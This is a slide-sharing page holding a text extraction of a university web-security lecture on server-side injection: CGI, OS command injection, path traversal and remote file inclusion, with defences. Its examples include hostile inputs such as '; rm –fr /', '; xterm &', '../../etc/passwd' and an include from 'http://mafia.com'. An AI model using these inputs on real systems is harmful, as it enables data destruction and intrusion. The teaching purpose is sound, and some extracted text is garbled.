injection attacks on server
play

Injection Attacks on Server (Section 7.3 in book + some extra stuff; - PowerPoint PPT Presentation

Mar 16, 2024 •119 likes •760 views

Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1 Recall: dynamically created web pages y y g Virtually all web pages you see are dynamically created

  1. Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1

  2. Recall: dynamically created web pages y y g Virtually all web pages you see are dynamically created execution to dynamically create a webpage HTTP request web browser web server dynamically dynamically generated HTML sws2 2

  3. CGI (Common Gateway Interface) Standard way for web server to interact with command line executables Given a request referring to such a cgi executable, eg http://bla.com/cgi-bin/my script?yr=2014&str=a%20name p g y_ p y the web server executes it, passing parameters to standard input, and returning the output (typically HTML) to client. For the URL above the web server would execute For the URL above, the web server would execute cgi-bin/my_script 2014 ”a name” The executable my_script can be in any programming language. sws2 3

  4. Example: CGI bash script #!/bin/bash echo 'Content-type: text/html' echo Content type: text/html echo '' echo '<html>' echo <html> echo '<head>' echo '<title>My first CGI bash script</title>' echo '</head>' h '</h d>' echo '<body>' echo 'Hello World' cat some_html_content.html echo '</body>' echo '</html>' exit 0 sws2 4

  5. Example: CGI perl script #!/usr/bin/perl print "Content-type: text/html\n\n"; print Content-type: text/html\n\n ; print <<HTML; <html> <head> <title>My first perl CGI script </title> </head> / <body> <p>Hello World</p> </body> HTML HTML exit; sws2 5

  6. Example: CGI program in C int main(){ /* Print CGI response header /* Print CGI response header, required for all HTML required for all HTML output. Note the extra \n, to send the blank line. */ printf("Content-type: text/html\n\n") ; /* Now print the HTML response. */ printf("<html>\n") ; p ( \ ) ; printf("<head><title>Hello world</title></head>\n"); printf("<body>\n"); printf("<h1>Hello, world.</h1>\n") ; i tf("<h1>H ll ld </h1>\ ") printf("</body>\n"); printf("</html>\n"); exit(0); } sws2 6

  7. CGI Pros • • extremely simple concept & interface extremely simple concept & interface • you can use any programming or scripting language – C(++), Java, Ruby,... bash, perl, python,... Cons • you can use any programming language you can use any programming language => no support for any web-specific features Esp clumsy parsing of standard input to retrieve GET and POST E l i f t d d i t t t i GET d POST parameters Hence: dedicated languages for web applications PHP, JSP, ASP.NET, Ruby on Rails,... sws2 7

  8. Example: PHP script <html> <head> <title>A simple PHP script </title> <body> <body> The number you choose was <?php echo $x = $_GET['number']; ?> <br> This number squared plus 1 is <?php p p $y = $x*$x; $y++; echo $y; ?> $y $ $ ; $y ; $y; <br> Btw, I know that your IP address is <? h <?php echo h $ SERVER['REMOTE ADDR'] $_SERVER['REMOTE_ADDR']; ?> ?> </body> </html> sws2 8

  9. 9 Security worries with dynamically Security worries with dynamically created web pages sws2

  10. Security worries... y Dynamically created web pages involve some processing at the server side which is based on some untrusted input from the client id hi h i b d t t d i t f th li t This processing involves execution or interpretation based on this input This processing involves execution or interpretation based on this input • this can be processing in the web application itself, but also in other components used, eg the OS or data base Tell-tale signs that some form of interpretation is going on: Tell-tale signs that some form of interpretation is going on: special characters @ \ . ; < > .... that have a special meaning sws2 10

  11. Attacker model attacker/client sends malicious input to server, with the goal to do some damage... ith th l t d d execution execution to dynamically create a webpage webpage malicious input web server sws2 11

  12. Attacks with malicious inputs can be attacks on • confidentiality fid ti lit – revealing information • integrity – corrupting information – incl. integrity of the system (web application, the OS, ...) itself • availability availability – DoS attacks on the server (or the underlying OS) – destroying information destroying information sws2 12

  13. Dynamically created webpages & injection attacks y y g j data data web server b base malicious li i input file system OS sws2 13

  14. Dynamically created webpages & injection attacks y y g j another user of the same website (di (discussed next week) d t k) data data web server b base malicious li i input file system OS sws2 14

  15. 15 Attacking the OS Attacking the OS (Not in book!) ) ( sws2

  16. Command injection (in a CGI script) j A CGI bash script might contain cat thefile | mail clientaddress t th fil | il li t dd to email a file to a user-supplied email address. Security worries? An attacker might enter the email address erik@cs.ru.nl ; rm –fr / Wh t h What happens then ? th ? cat thefile | mail erik@cs.ru.nl ; rm –fr / How would you prevent this? sws2 16

  17. Command injection (in a C program) j A C program accessible via CGI that prints something to a user- specified printer might include specified printer might include char buf[1024]; snprintf(buf, "system lpr –P %s", printer_name, sizeof(buf) 1); sizeof(buf)-1); system(buf); Security worries? S ? This can be attacked in the same way! Entering Entering someprintername ; xterm & is less destructive and more interesting than ...;rm –fr / The attacker can also try buffer overflow attacks on C(++) binaries accessible via the web! sws2 17

  18. OS command injection j Any server-side executable code that uses client input to interact with the underlying OS might be used to inject commands to OS. with the underlying OS might be used to inject commands to OS. Affects web applications irrespective of programming language used Dangerous things to look out for Dangerous things to look out for – C/C++ system(), execvp(), ShellExecute(), .. – Java Runtime.exec(), ... – system, exec, open, , /e, ... system, exec, open, `, /e, ... Perl Perl – Python exec, eval, input, execfile, ... For specific programming language there may be additional potential p p g g g g y p problems, eg. buffer overflows for C(++) How would you prevent this? How could you mitigate the potential impact of such attacks? sws2 18

  19. Protecting against OS injection attacks g g j • input validation: validate aka sanatize all user input to avoid d dangerous characters h t – but what are the dangerous characters? ; | > .... ; | – better to do white-listing than blacklisting; ie say which characters are allowed rather than which ones are not • input validation tries to prevent attacks; we should also try to mitigate the possible impact we should also try to mitigate the possible impact – by running the web application with minimal privileges (aka applying the principle of least privilege) sws2 19

  20. File name injection j Consider PHP code below, which uses PHP string concatenation operator . $base_dir = ”/usr/local/client-startpage/”; echo file_get_contents($base_dir . $_GET[’username’]); Security worries? Attacker might eg supply ../../etc/passwd as username g g pp y p Also known as path traversal attack Also known as path traversal attack How would you prevent this? sws2 20

  21. File name injection – path traversal attack j File name injection can reveal information (ie. violate confidentiality), but can also be used to cause DoS problems (ie violate availability) but can also be used to cause DoS problems (ie. violate availability) Eg by trying to – access a file or directory that does not exists – using special files (eg device files) such as /var/spool/printer, /dev/zero, /dev/full in unintended ways y sws2 21

  22. File name injection – path traversal attack j Obvious places for an attacker to try this: URL URLs which include a file name as parameter hi h i l d fil t Eg Eg http:/somesite.com/get-files.php?file=report.pdf http:/somesite.com/get-page.jsp?home=start.html http:/somesite.com/somepage.asp?page=index.html where attacker can try to manipulate the path eg where attacker can try to manipulate the path, eg. http:/somesite.com/get-files.php?file=../admin.cfg sws2 22

  23. 23 Attacking PHP web servers Attacking PHP web servers (Section 7.3.2 of book) ) ( sws2

  24. Consider some PHP code that acts on an option chosen from menu $dir = $_GET['option'] $di $ GET[' ti '] include($dir . ”/function.php”) eg to include start/function.php or stop/function.php p p p p p g Security worries? What if user supplies option “ http://mafia.com ” ? The web server would then execute http://mafia.com/function.php http://mafia.com/function.php This is called Remote File Inclusion (RFI). It allows an attacker to run arbitrary code on a server. Of course, server should be configured not to allow remote file inclusion sws2 24

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks

Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks

Web Securi rity ty Server -side security risks (esp sp. . injection jection atta ttacks) s) websec 1 Attacks on the web server malicious input web server er output This can be attacks on Availability: i.e. DoS attack, where attacker

1.86k views • 79 slides
Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David

Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David

Server-side Web Security: SQL Injection Attacks &amp; XSS CS 161: Computer Security Prof. David Wagner February 12, 2014 SQL Injection Scenario Suppose web server front end stores URL parameter recipient in variable $recipient and

656 views • 37 slides
Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for

Software and Web Security 2 Injection Attacks on Server (Section 7.3 in book + some extra stuff; Note: we skipped 7.2 for now) sws2 1 Recall: dynamically created web pages Most web pages you see are dynamically created (except for instance

1k views • 64 slides
Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5,

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5,

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa February 5, 2016 Credit: some slides are adapted from previous offerings of this course and from CS 241 of Prof. Dan Boneh What can go bad if a web server is

702 views • 37 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa March 20, 2018

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa March 20, 2018

Web Security: Injection Attacks CS 161: Computer Security Prof. Raluca Ada Popa March 20, 2018 Credit: some slides are adapted from previous offerings of this course and from CS 241 of Prof. Dan Boneh What can go bad if a web server is

1.13k views • 91 slides
Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D.

Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D.

Countering Code-Injection Attacks With Instruction-Set Randomization Gaurav S. Kc, Angelos D. Keromytis Columbia University Vassilis Prevelakis Drexel University 1 Overview of Technique Protect from code-injection attacks create

608 views • 19 slides
Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and

Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos , Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS What is all about? New code-injection attacks or return-to-libc attacks in the web

666 views • 48 slides
SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request forgery Code Injection Attacks Attacker executes arbitrary code on server Programming the program Not sanitizing user

287 views • 11 slides
Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo

Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo

PHP Aspis: Using Partial Taint Tracking To Protect Against Injection Attacks Ioannis Papagiannis , Matteo Migliavacca, Peter Pietzuch Department of Computing, Imperial College London USENIX WebApps 2011 Portland, OR, USA Injection

763 views • 47 slides
SQL Injection: Summary Target: web server that uses a back-end database Attacker goal:

SQL Injection: Summary Target: web server that uses a back-end database Attacker goal:

SQL Injection: Summary Target: web server that uses a back-end database Attacker goal: inject or modify database commands to either read or alter web-site information Attacker tools: ability to send requests to web server (e.g.,

89 views • 4 slides
SQL Injection Slides thanks to Prof. Shmatikov at UT Austin Dynamic Web Application GET /

SQL Injection Slides thanks to Prof. Shmatikov at UT Austin Dynamic Web Application GET /

SQL Injection Slides thanks to Prof. Shmatikov at UT Austin Dynamic Web Application GET / HTTP/1.0 Browser Web server HTTP/1.1 200 OK index.php Database server slide 2 PHP: Hypertext Preprocessor Server scripting language with C-like

601 views • 23 slides
A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Overviewtrated Account Summary Account: Account: &quot;SELECT

445 views • 32 slides
SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access Control 6 Security

682 views • 8 slides
SQL Injection Attacks Many web servers have backing databases Much of their information

SQL Injection Attacks Many web servers have backing databases Much of their information

SQL Injection Attacks Many web servers have backing databases Much of their information stored in a database Web pages are built (in part) based on queries to a database Possibly using some client input . . . Lecture 16 Page 1

646 views • 21 slides
Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to

Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to

Outline Classic code injection attacks CSci 5271 Announcements intermission Introduction to Computer Security Day 4: Low-level attacks Shellcode techniques Stephen McCamant University of Minnesota, Computer Science &amp; Engineering

412 views • 5 slides
Berkeley Heights School District Anti-Bullying Bill of Rights Reporting Period 1 Results June

Berkeley Heights School District Anti-Bullying Bill of Rights Reporting Period 1 Results June

Berkeley Heights School District Anti-Bullying Bill of Rights Reporting Period 1 Results June 7, 2018 Presented by: Kevin Morra District Anti-Bullying Coordinator Requirements of the Anti-Bullying Bill of Rights Public report of general

201 views • 6 slides
EMF Models getting XXL? An overview of available solutions Jonathan Lasalle Benoit Viaud ARTAL

EMF Models getting XXL? An overview of available solutions Jonathan Lasalle Benoit Viaud ARTAL

EMF Models getting XXL? An overview of available solutions Jonathan Lasalle Benoit Viaud ARTAL Technologies 227 rue Pierre Gilles de Gennes Ensemble La Rue Bt. 9 31670 Labge, France 05 61 00 39 30 artal@artal.fr The

1.3k views • 37 slides
Probabilistic Numerics Part II Linear Algebra and Nonlinear Optimization Philipp Hennig

Probabilistic Numerics Part II Linear Algebra and Nonlinear Optimization Philipp Hennig

Probabilistic Numerics Part II Linear Algebra and Nonlinear Optimization Philipp Hennig MLSS 2015 20 / 07 / 2015 Emmy Noether Group on Probabilistic Numerics Department of Empirical Inference Max Planck Institute for Intelligent

958 views • 60 slides
Runtime Verification of Executable Models Fernando Macas fernando.macias@hib.no Adrian Rutle

Runtime Verification of Executable Models Fernando Macas fernando.macias@hib.no Adrian Rutle

NWPT 2015 Runtime Verification of Executable Models Fernando Macas fernando.macias@hib.no Adrian Rutle adrian.rutle@hib.no Volker Stolz volker.stolz@hib.no Motivation Modelling offers one more level of abstraction above

1.07k views • 34 slides
Maintenance of Chronobiological Information by P System Mediated Assembly of Control Units for

Maintenance of Chronobiological Information by P System Mediated Assembly of Control Units for

Biological Rhythms P Meta Framework Assembly of Frequency Dividers Suprachiasmatic Nucleus Maintenance of Chronobiological Information by P System Mediated Assembly of Control Units for Oscillatory Waveforms and Frequency Thomas Hinze 1 , 2

664 views • 54 slides
eScience in the Netherlands Rob van Nieuwpoort R.vanNieuwpoort@esciencecenter.nl We work

eScience in the Netherlands Rob van Nieuwpoort R.vanNieuwpoort@esciencecenter.nl We work

eScience in the Netherlands Rob van Nieuwpoort R.vanNieuwpoort@esciencecenter.nl We work demand-driven 35 Career paths Scale eScience eScience top eScience top 13 manager specialist researcher eScience eScience eScience 12

819 views • 81 slides
Communication Privacy and Censorship Resistance Vitaly Shmatikov Privacy on Public Networks

Communication Privacy and Censorship Resistance Vitaly Shmatikov Privacy on Public Networks

Communication Privacy and Censorship Resistance Vitaly Shmatikov Privacy on Public Networks Internet is designed as a public network Routing information is public IP packet headers identify source and destination Even a passive

680 views • 65 slides
HTML 5: Fact and Fiction Nathaniel T. Schutta Who am I? Nathaniel T. Schutta

HTML 5: Fact and Fiction Nathaniel T. Schutta Who am I? Nathaniel T. Schutta

HTML 5: Fact and Fiction Nathaniel T. Schutta Who am I? Nathaniel T. Schutta http://www.ntschutta.com/jat/ @ntschutta Foundations of Ajax &amp; Pro Ajax and Java Frameworks UI guy Author, speaker, teacher More than a

631 views • 39 slides

More recommend